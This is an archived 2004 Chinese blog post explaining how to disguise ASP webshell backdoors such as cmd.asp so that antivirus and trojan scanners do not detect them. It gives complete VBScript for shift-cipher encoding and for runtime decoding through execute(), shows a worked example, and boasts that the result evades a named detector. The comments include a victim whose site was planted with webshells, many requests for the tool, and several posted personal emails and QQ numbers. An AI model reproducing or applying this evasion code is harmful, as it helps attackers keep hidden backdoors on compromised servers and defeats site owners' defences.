lake2的专栏

千秋邈矣独留我，百战归来再读书

lake2ID：lake2

共218132次访问，排名301好友0人，关注者5人
懒

lake2的文章

原创 65 篇

翻译 0 篇

转载 0 篇

评论 580 篇

lake2的公告

好好学习

最近评论

cqg1220：机柜

cqg1220：<span style='color:black'>机柜</span>

cqg1220：不错，谢谢楼主！[url=http://www.bjyhjg.com/][color=#000000]机柜[/color][/url]

文章分类

收藏

相册

About

Friends

Online

Technology

World

存档

软件项目交易

订阅我的博客

ASP后门之终极伪装收藏

新一篇: 利用%5c绕过验证 | 旧一篇: URL编码与SQL注射

标题：ASP后门之终极伪装

作者：lake2 （http://mrhupo.126.com）

时间：2004-8-21

申明：本文已刊登于《黑客X档案》2004年9期

　　记得当年asp木马出来的时候号称“永不被杀的木马”，呵呵，时至今日，随便什么杀毒软件都能将其杀得片甲不留^_^呵呵，受到木马换壳躲避杀毒软件思路影响，我们也可以给asp木马“加壳”（呵呵，当然不是用UPX等）。还等什么？请往下看。

　　其实这个思路很简单，就是把asp代码编码，执行时再解码。这里有两个方法，一是用微软的工具Script Encoder；二是利用asp的execute函数。

　　先说说Script Encoder。这个东东可以在微软官方网站免费下到，而且还附赠详细使用说明，这里就不多说了吧。但是经过它加密后的文件会有<%@ LANGUAGE = VBScript.Encode %>，呵呵，露马脚了，管理员看到这句话就知道这个asp文件被加密了。那怎么解密呢？这里提供一个解密软件（》点击进入下载《）。现在知道了吧，微软的Script Encoder不保险，所以呢，我们要自己写一个程序出来“加壳”。

　　asp的execute函数是拿来执行字符串的，即是说可以把asp语句写成字符串，然后用execute来执行。比如这行代码：execute("response.write(""hackerXfiles"")")，执行后的效果等同于执行response.write("hackerXfiles")。这里由于execute函数里的东东是字符串，故遇到引号要双写。呵呵，既然execute里是字符串，那么我们就可以把里面的东东拿来加密了。

　　怎么加密呢？呵呵，就用最简单的移位法好了。请看代码：

　　but=1
　　cc=replace(nr,vbcrlf,"胡")
　　for i= 1 to len(cc)
　　　　if mid(cc,i,1)<>"胡" then
　　　　　　pk=asc(mid(cc,i,1))+but
　　　　　　if pk>126 then
　　　　　　　　pk=pk-95
　　　　　　elseif pk<32 then
　　　　　　　　pk=pk+95
　　　　　　end if
　　　　　　temp=temp&chr(pk)
　　　　else
　　　　　　temp=temp&"胡"
　　　　end if
　　next
　　temp=replace(temp,"""","""""")
　　response.write(temp)

　　这段代码就是asp下的循环移位法。那个变量but就是移位的位数，可修改。呵呵，怎么叫循环呢？因为程序会比较字符的ascii码，当大于126或者小于32时就会处理，使范围在32～126之间。因为这样可以避免出现windows不能显示的字符。这也是一开始就把回车换行符替换掉的原因。这里我自己写了一个移位加密的asp程序xor.asp附上，希望对你有帮助。

　　那就让我们来看看用上面代码把response.write("hackerXfiles")加密后的结果：“sftqpotf/xsjuf)#ibdlfsYgjmft#*”，嘿嘿，这回神仙也看不懂了吧^_^

　　既然加了密，当然要解密啦，看解密代码：

function UnEncode(temp)
　　but=1 '这个是移位法所移的位数！注意修改此处与加密时使用的一致
　　for i =1 to len(temp)
　　　　if mid(temp,i,1)<>"胡" then
　　　　　　pk=asc(mid(temp,i,1))-but
　　　　　　if pk>126 then
　　　　　　　　pk=pk-95
　　　　　　elseif pk<32 then
　　　　　　　　pk=pk+95
　　　　　　end if
　　　　　　a=a&chr(pk)
　　　　else
　　　　　　a=a&vbcrlf
　　　　end if
　　next
　　UnEncode=a
end function

　　呵呵，现在知道怎么执行了吧，只需调用这个解密函数就是：execute(UnEncode("sftqpotf/xsjuf)#ibdlfsYgjmft#*"))，怎么样，是不是顺利执行了！

在这里给大家一个示范，好让大家明白怎么加密asp木马。由于海洋的asp木马代码太多，我人又懒，就拿那个短小精悍的cmd.asp来示范吧！

　　首先运行我写的那个xor.asp，然后用记事本打开cmd.asp，将它的asp代码部分复制到xor.asp的文本框（看图），

填好移位参数（这里我用的1），点“转换”，呵呵，结果就出来了。然后新建一个文本文档，把cmd.asp的内容复制进去，前面那个UnEncode函数内容也添进去（这里要注意修改UnEncode函数里变量but的值与加密时选的移位参数值一致），然后把它的asp部分替换成execute(UnEncode(hu))的形式，其中hu用前一步得到的加密结果赋值。呵呵，然后保存为asp文件就ok啦！这里就再罗嗦几句。如果代码比较长，可以分成几部分加密，然后多用几个execute执行就是，但是要注意必须保证asp代码的完整性，也就是说不能把相关联的代码如if、end if分到两个execute里去了。

　　看看吧，同样可以运行！

　　8期的光盘里有个思易ASP木马追捕器，呵呵，正好顺手拿来检测我们今天的成果。嘿嘿，看结果，它对cmd.asp原版本和用Script Encoder加过密的海洋顶端网的2005版可以检测到，而对我们刚才精心炮制的xcmd.asp却什么都检测不到！呵呵，知道厉害了吧^_^

（xcmd.asp、xor.asp下载）

发表于 @ 2004年11月23日 22:03:00|评论(loading...)|编辑

新一篇: 利用%5c绕过验证 | 旧一篇: URL编码与SQL注射

#icarusli 发表于2004-12-02 22:53:00 IP: 218.14.146.*: 你好，你真是太强啦。我在学习中.....

还有，一天我发现我的租用的web空间内有你所泡制出的两个文件，"webadmin.aspx，cmd.aspx" 我感到很是奇怪，我的网页只有新闻发布的功能，和一个动网的论坛，都没有上传的功能，这两个文件是怎么进去的?

#lake2 发表于2004-12-03 12:56:00 IP: 221.10.53.*: 不知道你还看不看得到。
动网论坛有上传文件漏洞……

#lake2 发表于2004-12-25 09:52:00 IP: 221.237.28.*: 喂，你又不留个联系方式怎么回复你嘛……
这里的移位加密只是为本文的思路举的例子，移位之后可能出现不可显示字符也说不一定；最好写段代码限制一下……你说的“亚洲”正巧如此
呵呵，感谢你看完我的文章！

#CCTV-20 发表于2004-12-24 00:18:00 IP: 60.55.55.*: 请问这个如何才能不把中文加密？

比如下面这个代码
If irs.EOF And irs.bof Then
country="亚洲"
city=""
Else
country=irs(0)
city=irs(1)
End If
加密后
Jg!jst/FPG!Boe!jst/cpg!Uifo胡dpvousz>#??#胡djuz>##胡Fmtf胡dpvousz>jst)1*胡djuz>jst)2*胡Foe!Jg

但中文字符亚洲两个字加密后，程序运行后就不一样了
请问如何才能不把中文字符加密？

#yys 发表于2005-06-22 15:31:00 IP: 61.186.252.*: 该文中的xor.rar怎么下不了？

#lake2 发表于2005-06-22 21:30:00 IP: 61.186.252.*: 哦，那个空间关闭了，这里有下
http://www.cnnb.net.cn/lake2/soft/xor.rar

#yys 发表于2005-06-23 18:09:00 IP: 61.186.252.*: 这个空间ttp://www.cnnb.net.cn/lake2/soft/xor.rar
也失效了！！！！我的邮箱xindu68129@163.com,给我发一份好吗？谢谢！！！

#lake2 发表于2005-06-23 19:41:00 IP: 61.186.252.*: 邮件已发送

#yys 发表于2005-06-28 11:17:00 IP: 61.186.252.*: 谢谢。

#乐方一号发表于2005-08-03 01:54:00 IP: 61.186.252.*: 这个算法真的很好用呢?不过能否写个也像xor.asp那样的解密代码文件.也就是把暗文输入进去,点转换就显示明文.我是菜鸟,现正碰到这个难题,望能帮我解决一下.我的EMAIL:haog18@tom.com

#csdn的朋友发表于2005-09-27 14:42:00 IP: 211.100.21.*: 我按照您的方法做了，可是加密后不能运行，能否发个
xor.rar 文件给我？

email: kinar@163.com

#csdn的朋友发表于2005-09-27 14:47:00 IP: 211.100.21.*: 您好，我按您的方法做了，可是加密后，不能运行，能否发个xor.rar 文件给我？谢谢。

email: kinar@163.com

#lizhixian 发表于2006-03-24 19:30:00 IP: 222.245.219.*: 密文是
jq>Sfrvftu/TfswfsWbsjbcmft)#TFSWFS`OBNF#*胡tfswfsjq>#nbpnbptivxv/dpn#胡tfswfsjq3>#mpdbmiptu#胡tfswfsjq4>nje)jq-jotus)jq-#/#*,2-mfo)jq*.!jotus)jq-#/#**胡jg!jq>tfswfsjq!ps!jq>tfswfsjq3!ps!tfswfsjq4>#nbpnbptivxv/dpn#!uifo胡tfu!st>tfswfs/DsfbufPckfdu)#bepec/sfdpsetfu#*胡st/pqfo!#tfmfdu!qspevduje-vtfsobnf-{ivbohubj-{pohfs-qspevdudpvou-ojnjoh!gspn!tipq`bdujpo#-dpoo-2-4胡st/beeofx胡st)#qspevduje#*>qspevduje胡st)#vtfsobnf#*>vtfsobnf胡st)#{ivbohubj#*>8胡st)#qspevdudpvou#*>2胡st)#{pohfs#*>ebokjb胡jg!sfrvftu/Dppljft)#tipqyq#*)#vtfsobnf#*>##!uifo胡st)#ojnjoh#*>2胡foe!jg胡st/vqebuf胡st/dmptf胡tfu!st>opuijoh胡sftqpotf/Sfejsfdu!#cvzqspevdu/btq@bdujpo>tipx#胡fmtf胡sftqpotf/Xsjuf!#Dpqzsjhiu!xxx/tipqyq/do!RR;94218:82!UFM;121.7:31:812.979#胡foe!jg

试解出明文,蛮急的，谢谢啦

我的邮箱是liye82519@yahoo.com.cn
QQ:87222215

#lizhixian 发表于2006-03-24 19:33:00 IP: 222.245.219.*: xor.rar怎么都下载不了呀？
能否提供一个解密的软件呀？

#lake2 发表于2006-03-24 19:56:00 IP: 125.71.3.*: http://www.0x54.org/lake2/program/xor.rar
可以下载到

#安然发表于2006-04-16 22:42:00 IP: 61.132.138.*: 这个不行了现在被杀了

#狼行无忌发表于2006-09-29 14:58:00 IP: 61.48.70.*: 给我发一个,我的邮箱是:dongbo.fx@163.com
谢谢

#athui 发表于2008-08-22 21:56:31 IP: 58.60.25.*: 68258753@qq.com帮忙发一份,谢谢！希望我可以再进一步提高。

发表评论

姓名：
主页：
校验码：看不清,换一张

当前用户设置只有注册用户才能发表评论。如果你没有登录，请点击登录